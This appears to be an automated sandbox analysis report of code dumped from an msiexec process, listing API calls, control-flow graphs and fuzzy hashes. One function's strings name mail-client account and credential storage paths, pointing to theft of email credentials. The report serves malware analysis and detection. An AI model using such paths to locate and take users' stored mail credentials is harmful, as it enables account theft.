                                                                                              • Part of subcall function 22F590BA: _free.LIBCMT ref: 22F591AF
                                                                                            • _free.LIBCMT ref: 22F57CFB
                                                                                              • Part of subcall function 22F5571E: HeapFree.KERNEL32(00000000,00000000,?,22F5924F,?,00000000,?,00000000,?,22F59276,?,00000007,?,?,22F57E5A,?), ref: 22F55734
                                                                                              • Part of subcall function 22F5571E: GetLastError.KERNEL32(?,?,22F5924F,?,00000000,?,00000000,?,22F59276,?,00000007,?,?,22F57E5A,?,?), ref: 22F55746
                                                                                            • _free.LIBCMT ref: 22F57D1D
                                                                                            • _free.LIBCMT ref: 22F57D32
                                                                                            • _free.LIBCMT ref: 22F57D3D
                                                                                            • _free.LIBCMT ref: 22F57D5F
                                                                                            • _free.LIBCMT ref: 22F57D72
                                                                                            • _free.LIBCMT ref: 22F57D80
                                                                                            • _free.LIBCMT ref: 22F57D8B
                                                                                            • _free.LIBCMT ref: 22F57DC3
                                                                                            • _free.LIBCMT ref: 22F57DCA
                                                                                            • _free.LIBCMT ref: 22F57DE7
                                                                                            • _free.LIBCMT ref: 22F57DFF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                            • String ID:
                                                                                            • API String ID: 161543041-0
                                                                                            • Opcode ID: 2c0d3e288313f3f951558c737070ce98937b4a0161155cbd654e973e86d831bc
                                                                                            • Instruction ID: cf6730b43c5eabcc810b69b7e9f0f3e9422a94428e937715107402109f73e6c1
                                                                                            • Opcode Fuzzy Hash: 2c0d3e288313f3f951558c737070ce98937b4a0161155cbd654e973e86d831bc
                                                                                            • Instruction Fuzzy Hash: B5314F71604708EFEB359B39EA40BA6B7EBEF00314F104459EA5ADB191DF71A9A1CB10

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 22F559EA
                                                                                              • Part of subcall function 22F5571E: HeapFree.KERNEL32(00000000,00000000,?,22F5924F,?,00000000,?,00000000,?,22F59276,?,00000007,?,?,22F57E5A,?), ref: 22F55734
                                                                                              • Part of subcall function 22F5571E: GetLastError.KERNEL32(?,?,22F5924F,?,00000000,?,00000000,?,22F59276,?,00000007,?,?,22F57E5A,?,?), ref: 22F55746
                                                                                            • _free.LIBCMT ref: 22F559F6
                                                                                            • _free.LIBCMT ref: 22F55A01
                                                                                            • _free.LIBCMT ref: 22F55A0C
                                                                                            • _free.LIBCMT ref: 22F55A17
                                                                                            • _free.LIBCMT ref: 22F55A22
                                                                                            • _free.LIBCMT ref: 22F55A2D
                                                                                            • _free.LIBCMT ref: 22F55A38
                                                                                            • _free.LIBCMT ref: 22F55A43
                                                                                            • _free.LIBCMT ref: 22F55A51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 36fcde5d5183bac1f4c29bcf7e073a94d27973c49b19419621f38b525d008baa
                                                                                            • Instruction ID: 0897869d60d15538e7f2d6cead65f85616f95c9464b28e586381026f4e54d2aa
                                                                                            • Opcode Fuzzy Hash: 36fcde5d5183bac1f4c29bcf7e073a94d27973c49b19419621f38b525d008baa
                                                                                            • Instruction Fuzzy Hash: EC11747A52034CFFCF25DF54D941CDD3FA6EF14350B5541A5BA088B225DA31DA619B80

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 287 22f5aa53-22f5aa6e 288 22f5aa80 287->288 289 22f5aa70-22f5aa7e RtlDecodePointer 287->289 290 22f5aa85-22f5aa8b 288->290 289->290 291 22f5aa91 290->291 292 22f5abb2-22f5abb5 290->292 295 22f5aa97-22f5aa9a 291->295 296 22f5aba6 291->296 293 22f5abb7-22f5abba 292->293 294 22f5ac12 292->294 300 22f5ac06 293->300 301 22f5abbc-22f5abbf 293->301 297 22f5ac19 294->297 298 22f5ab47-22f5ab4a 295->298 299 22f5aaa0 295->299 302 22f5aba8-22f5abad 296->302 303 22f5ac20-22f5ac49 297->303 308 22f5ab9d-22f5aba4 298->308 309 22f5ab4c-22f5ab4f 298->309 304 22f5ab34-22f5ab42 299->304 305 22f5aaa6-22f5aaab 299->305 300->294 306 22f5abc1-22f5abc4 301->306 307 22f5abfa 301->307 310 22f5ac5b-22f5ac6a call 22f52ada 302->310 334 22f5ac56-22f5ac59 303->334 335 22f5ac4b-22f5ac50 call 22f56368 303->335 304->303 311 22f5ab25-22f5ab2f 305->311 312 22f5aaad-22f5aab0 305->312 313 22f5abc6-22f5abc9 306->313 314 22f5abee 306->314 307->300 318 22f5ab61-22f5ab8f 308->318 315 22f5ab94-22f5ab9b 309->315 316 22f5ab51-22f5ab54 309->316 311->303 320 22f5aab2-22f5aab5 312->320 321 22f5ab1c-22f5ab23 312->321 322 22f5abe2 313->322 323 22f5abcb-22f5abd0 313->323 314->307 315->297 316->310 324 22f5ab5a 316->324 318->334 327 22f5aab7-22f5aaba 320->327 328 22f5ab0d-22f5ab17 320->328 326 22f5aac7-22f5aaf7 321->326 322->314 329 22f5abd2-22f5abd5 323->329 330 22f5abdb-22f5abe0 323->330 324->318 326->334 341 22f5aafd-22f5ab08 call 22f56368 326->341 327->310 333 22f5aac0 327->333 328->303 329->310 329->330 330->302 333->326 334->310 335->334 341->334
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: DecodePointer
                                                                                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                            • API String ID: 3527080286-3064271455
                                                                                            • Opcode ID: 612e59e784aee948890282ca126f54e5b50b089bdf9b38cd8631b8f5fbd3562a
                                                                                            • Instruction ID: 36032140da980a46f17c9a53045085e57dd0e56c045bcb27f09893908f876954
                                                                                            • Opcode Fuzzy Hash: 612e59e784aee948890282ca126f54e5b50b089bdf9b38cd8631b8f5fbd3562a
                                                                                            • Instruction Fuzzy Hash: B6514E71A00B09EBEF04DFA4D6885ADBBB7FF49314F104685E791A7264C7398A38C754

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 22F51D1B
                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 22F51D37
                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22F51D4B
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22F51D58
                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22F51D72
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22F51D7D
                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22F51D8A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                            • String ID:
                                                                                            • API String ID: 1454806937-0
                                                                                            • Opcode ID: f854d4cbbc06da7d928c43b68b9f1e3af3ad3e390cfdf0c81541a7f8eb8bf760
                                                                                            • Instruction ID: 537e104e9e1fc8083ab1ec72832000d9cfea86834cbe0c0dc40036205628f540
                                                                                            • Opcode Fuzzy Hash: f854d4cbbc06da7d928c43b68b9f1e3af3ad3e390cfdf0c81541a7f8eb8bf760
                                                                                            • Instruction Fuzzy Hash: 17210EB294221CBFD7109BA4CC8CFEBBAACEF18754F000965FA16D2144D7749E968B70

Control-flow Graph

[Graph image not included in this extraction; entry block 22f59492-22f594ef, API nodes: GetConsoleCP, WideCharToMultiByte, WriteFile (two call sites), GetLastError]
APIs
• GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,22F59C07,?,00000000,?,00000000,00000000), ref: 22F594D4
• __fassign.LIBCMT ref: 22F5954F
• __fassign.LIBCMT ref: 22F5956A
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 22F59590
• WriteFile.KERNEL32(?,?,00000000,22F59C07,00000000,?,?,?,?,?,?,?,?,?,22F59C07,?), ref: 22F595AF
• WriteFile.KERNEL32(?,?,?,22F59C07,00000000,?,?,?,?,?,?,?,?,?,22F59C07,?), ref: 22F595E8
Memory Dump Source
• Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
• Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 12df29dd5b461cb735673cd095240215aa9b3d60e2ec5bf81bed63f292f5177a
• Instruction ID: ff653a6b637315476e57ad563575647df118c89e1b9305c976d87dbf0fe01f51
• Opcode Fuzzy Hash: 12df29dd5b461cb735673cd095240215aa9b3d60e2ec5bf81bed63f292f5177a
• Instruction Fuzzy Hash: 4C51B571900345AFDB14CFA8C895AEEFBF9EF08300F14451AEA51E7285D6309965CFA0

Control-flow Graph

[Graph image not included in this extraction; entry block 22f53370-22f533b5, subcalls to 22f53330, 22f537a7, 22f53790, 22f53740, 22f53774, 22f53758 and 22f5bbe0; no direct API nodes]
APIs
• _ValidateLocalCookies.LIBCMT ref: 22F5339B
• ___except_validate_context_record.LIBVCRUNTIME ref: 22F533A3
• _ValidateLocalCookies.LIBCMT ref: 22F53431
• __IsNonwritableInCurrentImage.LIBCMT ref: 22F5345C
• _ValidateLocalCookies.LIBCMT ref: 22F534B1
Strings
Memory Dump Source
• Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
• Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 2c12651c929795b6d601fdd6b1795c3d0e9ce679018ab3c75dbcbbe56aaac35d
• Instruction ID: e3140960bf1ab87b15e87b3340c3bbdd69593cbf16d9a17e3dba13ba14d22a57
• Opcode Fuzzy Hash: 2c12651c929795b6d601fdd6b1795c3d0e9ce679018ab3c75dbcbbe56aaac35d
• Instruction Fuzzy Hash: 6A41C335E04308ABCF01CF6CC980A9EBBB7AF45328F108195EB159F255D735DA25CB91

Control-flow Graph

APIs
  • Part of subcall function 22F59221: _free.LIBCMT ref: 22F5924A
• _free.LIBCMT ref: 22F592AB
  • Part of subcall function 22F5571E: HeapFree.KERNEL32(00000000,00000000,?,22F5924F,?,00000000,?,00000000,?,22F59276,?,00000007,?,?,22F57E5A,?), ref: 22F55734
  • Part of subcall function 22F5571E: GetLastError.KERNEL32(?,?,22F5924F,?,00000000,?,00000000,?,22F59276,?,00000007,?,?,22F57E5A,?,?), ref: 22F55746
• _free.LIBCMT ref: 22F592B6
• _free.LIBCMT ref: 22F592C1
• _free.LIBCMT ref: 22F59315
• _free.LIBCMT ref: 22F59320
• _free.LIBCMT ref: 22F5932B
• _free.LIBCMT ref: 22F59336
Memory Dump Source
• Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
• Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
• Instruction ID: d7218650f79aa14c48c8cd05bbbc2f1898ae6eb4f75b4e865561ccdd7323e0ba
• Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
• Instruction Fuzzy Hash: C2118E31540B0CFADE38ABB1EE45FCF7B9FAF14700F400824AB99B6092DA24B5258791

Control-flow Graph

[Graph image not included in this extraction; entry block 22f58821-22f5883a, API nodes: MultiByteToWideChar (two call sites), WideCharToMultiByte]
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,22F56FFD,00000000,?,?,?,22F58A72,?,?,00000100), ref: 22F5887B
• MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,22F58A72,?,?,00000100,5EFC4D8B,?,?), ref: 22F58901
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 22F589FB
• __freea.LIBCMT ref: 22F58A08
  • Part of subcall function 22F556D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22F55702
• __freea.LIBCMT ref: 22F58A11
• __freea.LIBCMT ref: 22F58A36
Memory Dump Source
• Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
• Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
• Opcode ID: 18fdd99cb48f37c8e18de7b7f235eb008411012daa653d5b2898c4744eb1ecd7
• Instruction ID: e9e0cb8667e72003d4adb4e3fd08e15bec71119b65d00b8804184a77815c56b7
• Opcode Fuzzy Hash: 18fdd99cb48f37c8e18de7b7f235eb008411012daa653d5b2898c4744eb1ecd7
• Instruction Fuzzy Hash: 0851D372610316BBEB198E64CD44EAF7BABEF50754F514669FF04D6180EB34ECA0C690

Control-flow Graph

APIs
• _strlen.LIBCMT ref: 22F51607
• _strcat.LIBCMT ref: 22F5161D
• lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,22F5190E,?,?,00000000,?,00000000), ref: 22F51643
• lstrcatW.KERNEL32(?,?,?,?,?,?,22F5190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 22F5165A
• lstrlenW.KERNEL32(?,?,?,?,?,22F5190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 22F51661
• lstrcatW.KERNEL32(00001008,?,?,?,?,?,22F5190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 22F51686
Memory Dump Source
• Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
• Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
Similarity
• API ID: lstrcatlstrlen$_strcat_strlen
• String ID:
• API String ID: 1922816806-0
• Opcode ID: 907de23da09e7e2ace1e2abc207a6e222fead6b823f08cbf42d75b5208bf2b0c
• Instruction ID: dbb93eb3173834c9b5cb61709e10c36945577192d1523029cff0aea21d3322cb
• Opcode Fuzzy Hash: 907de23da09e7e2ace1e2abc207a6e222fead6b823f08cbf42d75b5208bf2b0c
• Instruction Fuzzy Hash: E621C536900304BBDB049F68DC84EFF77B9EF88720F24441AEA04AB285EB34A55197A5

Control-flow Graph

APIs
• lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 22F51038
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 22F5104B
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 22F51061
• lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 22F51075
• GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 22F51090
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 22F510B8
Memory Dump Source
• Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
• Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
Similarity
• API ID: lstrlen$AttributesFilelstrcat
• String ID:
• API String ID: 3594823470-0
• Opcode ID: 88accb53f6a1f4905ccf450a78eeacfca70e2ae6fca998db52e53db983b5c7ed
• Instruction ID: 68ae111dec8897bf5681c0347cf8acde47113a83acd8c1e457d8fcb094910238
• Opcode Fuzzy Hash: 88accb53f6a1f4905ccf450a78eeacfca70e2ae6fca998db52e53db983b5c7ed
• Instruction Fuzzy Hash: A121B236900318ABCF14DB64DD48EDF377AEF44724F104696EA59A31B5DE30AAA6CF40
APIs
• GetLastError.KERNEL32(?,?,22F53518,22F523F1,22F51F17), ref: 22F53864
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 22F53872
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 22F5388B
• SetLastError.KERNEL32(00000000,?,22F53518,22F523F1,22F51F17), ref: 22F538DD
Memory Dump Source
• Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
• Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 0962288e2fbf6ff63a510eb0c7b30a3e35d031a8d8d3fcbc8a0627a1e4e153ba
• Instruction ID: 88aab048833cf25f3ccd0998ea170fd9947bee6922d9b1c027df5814d617176d
• Opcode Fuzzy Hash: 0962288e2fbf6ff63a510eb0c7b30a3e35d031a8d8d3fcbc8a0627a1e4e153ba
• Instruction Fuzzy Hash: 1201D433A4DB117EA60C2A7D6D84E167B97DF15F7AB200629EB309D1D5EF1948398340
APIs
• GetLastError.KERNEL32(?,?,22F56C6C), ref: 22F55AFA
• _free.LIBCMT ref: 22F55B2D
• _free.LIBCMT ref: 22F55B55
• SetLastError.KERNEL32(00000000,?,?,22F56C6C), ref: 22F55B62
• SetLastError.KERNEL32(00000000,?,?,22F56C6C), ref: 22F55B6E
• _abort.LIBCMT ref: 22F55B74
Memory Dump Source
• Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
• Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
• Opcode ID: 28dbf37c55caccfba7e8270e7fe4bfbb75396c2caa1be5c82fcd3371507d5831
• Instruction ID: 600221286b5169c2b48b9dfd01df0731cf34375e1a866c7448c206d9564e166e
• Opcode Fuzzy Hash: 28dbf37c55caccfba7e8270e7fe4bfbb75396c2caa1be5c82fcd3371507d5831
• Instruction Fuzzy Hash: 44F0A4B2645F00BBD61627346D4CF1E7A6B8FD1F75B250524FF34A6185EE2885324264
APIs
  • Part of subcall function 22F51E89: lstrlenW.KERNEL32(?,?,?,?,?,22F510DF,?,?,?,00000000), ref: 22F51E9A
  • Part of subcall function 22F51E89: lstrcatW.KERNEL32(?,?,?,22F510DF,?,?,?,00000000), ref: 22F51EAC
  • Part of subcall function 22F51E89: lstrlenW.KERNEL32(?,?,22F510DF,?,?,?,00000000), ref: 22F51EB3
  • Part of subcall function 22F51E89: lstrlenW.KERNEL32(?,?,22F510DF,?,?,?,00000000), ref: 22F51EC8
  • Part of subcall function 22F51E89: lstrcatW.KERNEL32(?,22F510DF,?,22F510DF,?,?,?,00000000), ref: 22F51ED3
• GetFileAttributesW.KERNEL32(?,?,?,?), ref: 22F5122A
  • Part of subcall function 22F5173A: _strlen.LIBCMT ref: 22F51855
  • Part of subcall function 22F5173A: _strlen.LIBCMT ref: 22F51869
Strings
Memory Dump Source
• Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
• Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
Similarity
• API ID: lstrlen$_strlenlstrcat$AttributesFile
• String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
• API String ID: 4036392271-1520055953
• Opcode ID: b46787ead22ce2441d0ee4026aac25c04d987f223c89513558baf61e6948ecc4
• Instruction ID: b5cab3a4377c95881a0d97db93ee0f247c93e093e74211c17cc7b1287fc71861
• Opcode Fuzzy Hash: b46787ead22ce2441d0ee4026aac25c04d987f223c89513558baf61e6948ecc4
• Instruction Fuzzy Hash: F6218179E103086AEB1497A4EC81BEE733AEF90B14F000556F704EB2E4E6B16D948759
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,22F54AEA,?,?,22F54A8A,?,22F62238,0000000C,22F54BBD,00000000,00000000), ref: 22F54B59
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 22F54B6C
• FreeLibrary.KERNEL32(00000000,?,?,?,22F54AEA,?,?,22F54A8A,?,22F62238,0000000C,22F54BBD,00000000,00000000,?,22F52082), ref: 22F54B8F
Strings
Memory Dump Source
• Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
• Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 34f0d4fc1fc09c2611c24ebdf78155c2c8dd37ea7e86cfcd6725def38b4887d8
• Instruction ID: 6782b2f976f03cfafa47d32a7b034db32cdc8ffd0722fa8a4cc64e538d3211ee
• Opcode Fuzzy Hash: 34f0d4fc1fc09c2611c24ebdf78155c2c8dd37ea7e86cfcd6725def38b4887d8
• Instruction Fuzzy Hash: FBF0C232A42708BFEB019F94C808FAEBFBAEF04755F000164FE05A6148DB348A61CB90
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 22F5715C
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 22F5717F
  • Part of subcall function 22F556D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22F55702
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 22F571A5
• _free.LIBCMT ref: 22F571B8
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 22F571C7
Memory Dump Source
• Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
• Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: c7593d6bcd802701e3930a1540d80fb739c624631650e62bc0e9aee51828a596
• Instruction ID: a6c1bdf4fd7a698df2da75d00c9d9e8bbd043654a5230c735f4f1ffb1eb01a60
• Opcode Fuzzy Hash: c7593d6bcd802701e3930a1540d80fb739c624631650e62bc0e9aee51828a596
• Instruction Fuzzy Hash: E60184736063157F37210ABA5C88DBB7A6FDEC2EA43200569FF04C720CEA648C2285B0
APIs
• GetLastError.KERNEL32(00000000,?,00000000,22F5636D,22F55713,00000000,?,22F52249,?,?,22F51D66,00000000,?,?,00000000), ref: 22F55B7F
• _free.LIBCMT ref: 22F55BB4
• _free.LIBCMT ref: 22F55BDB
• SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22F55BE8
• SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22F55BF1
Memory Dump Source
• Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
• Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: a1cb5a474f6d6bd77c92cd8f657c16084b9f6f634a334a643243b07fce233f34
• Instruction ID: 266fa80fa2cd48674871580b461d1e8c62cf84300e7fb9e4d9296f70913fab03
• Opcode Fuzzy Hash: a1cb5a474f6d6bd77c92cd8f657c16084b9f6f634a334a643243b07fce233f34
• Instruction Fuzzy Hash: 570128B3245F01B7920617381D88E1F7A6BDFC2B747210124FF35E6146EE28C9364260
APIs
• lstrlenW.KERNEL32(?,?,?,?,?,22F510DF,?,?,?,00000000), ref: 22F51E9A
• lstrcatW.KERNEL32(?,?,?,22F510DF,?,?,?,00000000), ref: 22F51EAC
• lstrlenW.KERNEL32(?,?,22F510DF,?,?,?,00000000), ref: 22F51EB3
• lstrlenW.KERNEL32(?,?,22F510DF,?,?,?,00000000), ref: 22F51EC8
• lstrcatW.KERNEL32(?,22F510DF,?,22F510DF,?,?,?,00000000), ref: 22F51ED3
Memory Dump Source
• Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
• Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
Similarity
• API ID: lstrlen$lstrcat
• String ID:
• API String ID: 493641738-0
• Opcode ID: 0b1517858cfc6358ecb66650b4311069581f45bc104c945ee176bec0c95fb46c
• Instruction ID: 3f126e283be8022302d791d69c57805e665bb67a3a7835b41d0fdfc27963803d
• Opcode Fuzzy Hash: 0b1517858cfc6358ecb66650b4311069581f45bc104c945ee176bec0c95fb46c
